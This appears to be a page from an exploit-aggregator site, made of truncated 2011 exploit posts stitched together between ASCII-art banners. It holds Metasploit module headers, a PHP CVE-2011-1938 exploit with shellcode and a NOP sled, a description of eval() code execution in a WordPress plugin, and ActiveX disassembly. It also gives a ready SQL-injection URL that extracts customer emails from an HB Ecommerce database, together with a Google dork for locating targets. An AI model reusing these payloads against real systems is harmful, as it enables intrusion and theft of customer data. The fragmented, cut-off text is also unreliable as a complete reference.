=================================================================================
.__ .__ __ .__ .___
____ ___ _________ [...]
=================================================================================
.__ .__ __ .__ .___
____ ___ _________ [...]
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ [...]
##
# $Id: igss9_igssdataserver_listall.rb 12639 2011-05-16 19:30:17Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require ‘msf/core’
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
[...]
=================================================================================
.__ .__ __ .__ .___
____ ___ _________ [...]
=================================================================================
.__ .__ __ .__ .___
____ ___ _________ [...]
# Exploit Title: is-human (1.4.2 and prior) Worpdress plugin.
# Date: 16.05.2011
# Author: neworder [www.neworder-ind.net]
# Software Link: http://wordpress.org/extend/plugins/is-human/
# Version: 1.4.2
# Tested on: Linux Platform
The vulnerability exists in /is-human/engine.php .
It is possible to take control of the eval() function via the ‘type’ parameter,
when the ‘action’ is set to log-reset. From here we can run out own code.
In [...]
=================================================================================
.__ .__ __ .__ .___
____ ___ _________ [...]
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ [...]
Trade Line Web <= Remote ‘id’ Funcs SQL-i Vulnerabilities
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ [...]
[*]==================================================================>
[*]
[*] Multiple Vulnerabilities in Zen Cart
[*]
[*] [ Vendor SW ] => Zen Cart – http://www.zen-cart.com
[*] [ Version ] => 1.3.9f, 1.3.9h (but possible all versions)
[*] [ Vendor URL ] => www.zen-cart.com
[*] [ Tested on [...]
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ [...]
=================================================================================
.__ .__ __ .__ .___
____ ___ _________ [...]
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ [...]
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ [...]
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ [...]
<?php
// Credit: Mateusz Kocielski, Marek Kroemeke and Filip Palian
// Affected Versions: 5.3.3-5.3.6
echo "[+] CVE-2011-1938";
echo "[+] there we go…n";
define(‘EVIL_SPACE_ADDR’, "xffxffxeexb3");
define(‘EVIL_SPACE_SIZE’, 1024*1024*8);
$SHELLCODE =
"x6ax31×58×99xcdx80×89xc3×89xc1×6ax46×58xcdx80xb0".
"x0bx52×68×6ex2fx73×68×68×2fx2fx62×69×89xe3×89xd1".
"xcdx80";
echo "[+] creating the sled.n";
$CODE = str_repeat("x90", EVIL_SPACE_SIZE);
for ($i = 0, [...]
##
# $Id: awstatstotals_multisort.rb 12715 2011-05-25 10:45:36Z patrickw $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require ‘msf/core’
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
[...]
Magneto ICMP ActiveX v4.0.0.20 ICMPSendEchoRequest Remote Code Execute
Date: 2011-5-27
Discovered by: boahat
vendor: http://www.magnetosoft.com/
Download: http://www.magnetosoft.com/downloads/skicmp_setup.exe
SKIcmp.ocx
Function ICMPSendEchoRequest (
ByVal bstrDestinationAddress As String
) As Long
.text:1000F012 mov edx, [ebx+8] // edx can be control
.text:1000F015 [...]
————-[ HB ECOMMERCE SQL Injection Vulnerability ]—————
————————————————————————
————————————————————————
[+] Exploit Title: [ HB ECOMMERCE SQL Injection Vulnerability ]
[+] Google Dork: intext:’supplied by hb ecommerce’
[+] Date: 26.05.2011
[+] Author: takeshix
[+] Author Contact: takeshix@safe-mail.net
[+] Software Link: http://www.hbecommerce.co.uk/
[+] Tested on: Debian GNU/Linux Testing(Wheezy) x64
[+] System: PHP
————————————————————————
————————————————————————
vulnerable url:
/templates1/view_product.php?product=3D
Example:
http://localhost/templates1/view_product.php?product=3D[SQL INJECTION]
Get an Mail from the Customers Table:
http://localhost/templates1/view_product.php?product=3D94746%20AND%20%28SEL=
ECT%20716%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%28CHAR%2858%2C122%2C99%=
2C109%2C58%29%2C%28SELECT%20MID%28%28IFNULL%28CAST%28email%20AS%20CHAR%29%2=
CCHAR%2832%29%29%29%2C1%2C50%29%20FROM%20%60web34-hbecommerc%60.customers%2=
0LIMIT%205%2C1%29%2CCHAR%2858%2C109%2C103%2C100%2C58%29%2CFLOOR%28RAND%280%=
29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%2=
9a%29%20
note: customer passwords dumped in plaintext!
————————————————————————
————————————————————————
Greez to: esc0bar [...]